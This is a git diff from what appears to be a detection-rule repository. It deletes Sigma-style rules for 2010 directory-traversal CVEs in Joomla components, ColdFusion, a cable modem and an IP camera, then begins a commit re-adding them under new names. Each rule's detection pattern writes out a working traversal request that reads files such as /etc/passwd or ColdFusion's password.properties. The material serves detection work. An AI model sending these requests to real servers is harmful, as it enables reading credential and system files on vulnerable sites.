/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1353 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1353 exploitation attempt.yaml deleted file mode 100644 index 1ba62bda..00000000 --- a/rules/web/web_cve_CVE-2010-1353 exploitation attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-1353 exploitation attempt -id: 26d15692-1cfc-4427-8e7d-9a364c2628f3 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) - component for Joomla! allows remote attackers to read arbitrary files via a .. (dot - dot) in the view parameter to index.php. -references: -- https://www.exploit-db.com/exploits/12068 -- https://www.cvedetails.com/cve/CVE-2010-1353 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1474 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1474 exploitation attempt.yaml deleted file mode 100644 index 21b6dc41..00000000 --- a/rules/web/web_cve_CVE-2010-1474 exploitation attempt.yaml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1474 exploitation attempt -id: 5b50ffc4-dde4-4905-9da9-eb499ee53971 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) - component 1.5.x for Joomla! allows remote attackers to read arbitrary files and - possibly have unspecified other impact via a .. (dot dot) in the controller parameter - to index.php. -references: -- https://www.exploit-db.com/exploits/12182 -- https://www.cvedetails.com/cve/CVE-2010-1474 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1475 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1475 exploitation attempt.yaml deleted file mode 100644 index 4786c685..00000000 --- a/rules/web/web_cve_CVE-2010-1475 exploitation attempt.yaml +++ /dev/null @@ -1,24 +0,0 @@ -title: CVE-2010-1475 exploitation attempt -id: 69295f5a-428a-47d6-bf4d-a93bb23270ca -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) - component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and - possibly have unspecified other impact via a .. (dot dot) in the controller parameter - to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1495 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1495 exploitation attempt.yaml deleted file mode 100644 index 9e3ef52a..00000000 --- a/rules/web/web_cve_CVE-2010-1495 exploitation attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-1495 exploitation attempt -id: e21410ad-5016-457a-a48f-2da871951471 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Matamko (com_matamko) component - 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) - in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/12286 -- https://www.cvedetails.com/cve/CVE-2010-1495 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1532 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1532 exploitation attempt.yaml deleted file mode 100644 index bb5f49b8..00000000 --- a/rules/web/web_cve_CVE-2010-1532 exploitation attempt.yaml +++ /dev/null @@ -1,24 +0,0 @@ -title: CVE-2010-1532 exploitation attempt -id: 92b23f0b-aa99-497a-a0f1-f7e632bcad7b -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) - component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and - possibly have unspecified other impact via a .. (dot dot) in the controller parameter - to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1533 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1533 exploitation attempt.yaml deleted file mode 100644 index 31ae9336..00000000 --- a/rules/web/web_cve_CVE-2010-1533 exploitation attempt.yaml +++ /dev/null @@ -1,23 +0,0 @@ -title: CVE-2010-1533 exploitation attempt -id: 2e547af2-0fb1-4d26-829e-fb42d959133c -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the TweetLA (com_tweetla) component - 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot - dot) in the controller parameter to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1535 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1535 exploitation attempt.yaml deleted file mode 100644 index d2ee67cd..00000000 --- a/rules/web/web_cve_CVE-2010-1535 exploitation attempt.yaml +++ /dev/null @@ -1,24 +0,0 @@ -title: CVE-2010-1535 exploitation attempt -id: 7dbde0a0-bd74-47ba-85f7-32093ffbd50c -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the TRAVELbook (com_travelbook) - component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and - possibly have unspecified other impact via a .. (dot dot) in the controller parameter - to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1602 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1602 exploitation attempt.yaml deleted file mode 100644 index 564faaf9..00000000 --- a/rules/web/web_cve_CVE-2010-1602 exploitation attempt.yaml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1602 exploitation attempt -id: d79bf48d-2705-4da1-929b-37e07764998f -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) - component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and - possibly have unspecified other impact via a .. (dot dot) in the controller parameter - to index.php. -references: -- https://www.exploit-db.com/exploits/12283 -- https://www.cvedetails.com/cve/CVE-2010-1602 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1657 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1657 exploitation attempt.yaml deleted file mode 100644 index 447bbe51..00000000 --- a/rules/web/web_cve_CVE-2010-1657 exploitation attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-1657 exploitation attempt -id: 7bdc9bd3-8dcd-4187-ab28-98b20cc1d020 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the SmartSite (com_smartsite) component - 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot - dot) in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/12428 -- https://www.cvedetails.com/cve/CVE-2010-1657 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1718 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1718 exploitation attempt.yaml deleted file mode 100644 index 148380f1..00000000 --- a/rules/web/web_cve_CVE-2010-1718 exploitation attempt.yaml +++ /dev/null @@ -1,24 +0,0 @@ -title: CVE-2010-1718 exploitation attempt -id: a538251c-d600-43f3-8051-c3a83a5e8702 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in archeryscores.php in the Archery - Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to - include and execute arbitrary local files via a .. (dot dot) in the controller parameter - to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1722 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1722 exploitation attempt.yaml deleted file mode 100644 index 94179320..00000000 --- a/rules/web/web_cve_CVE-2010-1722 exploitation attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-1722 exploitation attempt -id: 84715b18-505d-4252-9470-03c98a3006e5 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Online Market (com_market) component - 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have - unspecified other impact via a .. (dot dot) in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/12177 -- https://www.cvedetails.com/cve/CVE-2010-1722 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1875 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1875 exploitation attempt.yaml deleted file mode 100644 index 9bd796a5..00000000 --- a/rules/web/web_cve_CVE-2010-1875 exploitation attempt.yaml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-1875 exploitation attempt -id: af757e17-ad81-4a28-a551-49c17aa5113a -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Real Estate Property (com_properties) - component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files - and possibly have unspecified other impact via a .. (dot dot) in the controller - parameter to index.php. -references: -- https://www.exploit-db.com/exploits/11851 -- https://www.cvedetails.com/cve/CVE-2010-1875 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1953 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1953 exploitation attempt.yaml deleted file mode 100644 index 4f10cf4e..00000000 --- a/rules/web/web_cve_CVE-2010-1953 exploitation attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-1953 exploitation attempt -id: 0fc4af77-6974-4e50-bf5e-9f175304eb54 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) - component 1.0 for Joomla! allows remote attackers to read arbitrary files via a - .. (dot dot) in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/12288 -- https://www.cvedetails.com/cve/CVE-2010-1953 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1954 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1954 exploitation attempt.yaml deleted file mode 100644 index 23ef2619..00000000 --- a/rules/web/web_cve_CVE-2010-1954 exploitation attempt.yaml +++ /dev/null @@ -1,23 +0,0 @@ -title: CVE-2010-1954 exploitation attempt -id: 2ccf65c5-e4b3-48f6-961e-93bbd537ca80 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) - component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files - via a .. (dot dot) in the controller parameter to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1955 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1955 exploitation attempt.yaml deleted file mode 100644 index 10d81d67..00000000 --- a/rules/web/web_cve_CVE-2010-1955 exploitation attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-1955 exploitation attempt -id: 497c0911-226f-48a1-ac9f-518ffb98e65e -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) - component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via - a .. (dot dot) in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/12238 -- https://www.cvedetails.com/cve/CVE-2010-1955 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1979 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1979 exploitation attempt.yaml deleted file mode 100644 index 80eb1897..00000000 --- a/rules/web/web_cve_CVE-2010-1979 exploitation attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-1979 exploitation attempt -id: 5b1c3030-e17b-43b3-b95e-952355a0f43f -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) - component build 880 for Joomla! allows remote attackers to read arbitrary files - via a .. (dot dot) in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/12088 -- https://www.cvedetails.com/cve/CVE-2010-1979 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-1983 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-1983 exploitation attempt.yaml deleted file mode 100644 index a29bfea4..00000000 --- a/rules/web/web_cve_CVE-2010-1983 exploitation attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-1983 exploitation attempt -id: c4f29c4f-0281-4518-a824-88f259d92ef5 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) - component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary - files via a .. (dot dot) in the view parameter to index.php -references: -- https://www.exploit-db.com/exploits/12055 -- https://www.cvedetails.com/cve/CVE-2010-1983 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-2033 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2033 exploitation attempt.yaml deleted file mode 100644 index 20b4dc70..00000000 --- a/rules/web/web_cve_CVE-2010-2033 exploitation attempt.yaml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-2033 exploitation attempt -id: b5c6267a-7b2e-47c8-84dd-68a89ceb1e64 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) - component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly - have unspecified other impact via a .. (dot dot) in the controller parameter to - index.php. -references: -- https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html -- https://www.cvedetails.com/cve/CVE-2010-2033 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-2036 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2036 exploitation attempt.yaml deleted file mode 100644 index f6c9adca..00000000 --- a/rules/web/web_cve_CVE-2010-2036 exploitation attempt.yaml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-2036 exploitation attempt -id: 5f89e5fb-6f87-4fee-96b2-700e987a1c7e -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) - component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly - have unspecified other impact via a .. (dot dot) in the controller parameter to - index.php. -references: -- https://www.exploit-db.com/exploits/34004 -- https://www.cvedetails.com/cve/CVE-2010-2036 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-2259 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2259 exploitation attempt.yaml deleted file mode 100644 index 70cc525b..00000000 --- a/rules/web/web_cve_CVE-2010-2259 exploitation attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-2259 exploitation attempt -id: 7ead4790-e0f8-41fa-bb14-f1d225964fd4 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component - for Joomla! allows remote attackers to include and execute arbitrary local files - via a .. (dot dot) in the controller parameter to index.php. -references: -- https://www.exploit-db.com/exploits/10946 -- https://www.cvedetails.com/cve/CVE-2010-2259 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-2307 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2307 exploitation attempt.yaml deleted file mode 100644 index 32008b7c..00000000 --- a/rules/web/web_cve_CVE-2010-2307 exploitation attempt.yaml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-2307 exploitation attempt -id: 6e0a4fc5-c7a5-40c6-a080-bc5a452637a9 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Multiple directory traversal vulnerabilities in the web server for Motorola - SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow - remote attackers to read arbitrary files via (1) "//" (multiple leading slash), - (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. -references: -- https://www.securityfocus.com/bid/40550/info -- https://nvd.nist.gov/vuln/detail/CVE-2010-2307 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /../../etc/passwd - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-2682 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2682 exploitation attempt.yaml deleted file mode 100644 index 01e0fedc..00000000 --- a/rules/web/web_cve_CVE-2010-2682 exploitation attempt.yaml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-2682 exploitation attempt -id: 5f7ea8cf-47e3-46e6-a173-43a99c904e43 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) - component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and - possibly have unspecified other impact via a .. (dot dot) in the controller parameter - to index.php. -references: -- https://www.exploit-db.com/exploits/14017 -- https://www.cvedetails.com/cve/CVE-2010-2682 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-2861 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-2861 exploitation attempt.yaml deleted file mode 100644 index 7dc8e6df..00000000 --- a/rules/web/web_cve_CVE-2010-2861 exploitation attempt.yaml +++ /dev/null @@ -1,27 +0,0 @@ -title: CVE-2010-2861 exploitation attempt -id: 21032758-8761-4a18-8f66-bace612e2481 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Multiple directory traversal vulnerabilities in the administrator console - in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files - via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, - (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm - in CFIDE/administrator/. -references: -- https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861 -- http://www.adobe.com/support/security/bulletins/apsb10-18.html -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-3426 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-3426 exploitation attempt.yaml deleted file mode 100644 index ad2dab17..00000000 --- a/rules/web/web_cve_CVE-2010-3426 exploitation attempt.yaml +++ /dev/null @@ -1,23 +0,0 @@ -title: CVE-2010-3426 exploitation attempt -id: 06621f7e-2987-4625-8c42-d66951a9da9d -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone) - component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute - arbitrary local files via a .. (dot dot) in the controller parameter to index.php. -references: -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-4231 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-4231 exploitation attempt.yaml deleted file mode 100644 index 5e4062f3..00000000 --- a/rules/web/web_cve_CVE-2010-4231 exploitation attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-4231 exploitation attempt -id: 8eb41b36-2b5a-44e0-a44b-b0ebdbff3e1b -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. - The server is vulnerable to directory transversal attacks, allowing access to any - file on the camera file system. -references: -- https://nvd.nist.gov/vuln/detail/CVE-2010-4231 -- https://www.exploit-db.com/exploits/15505 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /../../../../../../../../../../../../../etc/passwd - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-4617 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-4617 exploitation attempt.yaml deleted file mode 100644 index 080cc881..00000000 --- a/rules/web/web_cve_CVE-2010-4617 exploitation attempt.yaml +++ /dev/null @@ -1,25 +0,0 @@ -title: CVE-2010-4617 exploitation attempt -id: ed14d2cb-8716-4ab1-a819-36d173e617ab -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in the JotLoader (com_jotloader) component - 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory - traversal sequences in the section parameter to index.php. -references: -- https://www.exploit-db.com/exploits/15791 -- https://www.cvedetails.com/cve/CVE-2010-4617 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical diff --git a/rules/web/web_cve_CVE-2010-5278 exploitation attempt.yaml b/rules/web/web_cve_CVE-2010-5278 exploitation attempt.yaml deleted file mode 100644 index cf20ed0e..00000000 --- a/rules/web/web_cve_CVE-2010-5278 exploitation attempt.yaml +++ /dev/null @@ -1,26 +0,0 @@ -title: CVE-2010-5278 exploitation attempt -id: 57bb7f1b-bb41-400d-a6e4-7eb2b70b3593 -Author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 -status: experimental -description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php - in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, - allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key - parameter. -references: -- https://www.exploit-db.com/exploits/34788 -- https://www.cvedetails.com/cve/CVE-2010-5278 -- https://github.com/projectdiscovery/nuclei-templates -detection: - selection: - c-uri|contains: - - /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00 - condition: selection -false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown -tags: -- attack.initial_access -- attack.t1190 -level: critical From 1bb99b4ece04264962895605d6b5fcbb1b34f3cd Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Wed, 25 Aug 2021 21:44:23 +0530 Subject: [PATCH 0581/1367] Readd --- ...aml => web_cve_CVE-2010-0943_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-0944_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-1306_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-1314_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-1345_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-1353_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-1474_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-1475_exploitation_attempt.yaml} | 7 +++---- ...aml => web_cve_CVE-2010-1495_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-1532_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-1533_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-1535_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-1602_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-1657_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-1718_exploitation_attempt.yaml} | 6 +++--- ...aml => web_cve_CVE-2010-1722_exploitation_attempt.yaml} | 6 +++--- ...aml => 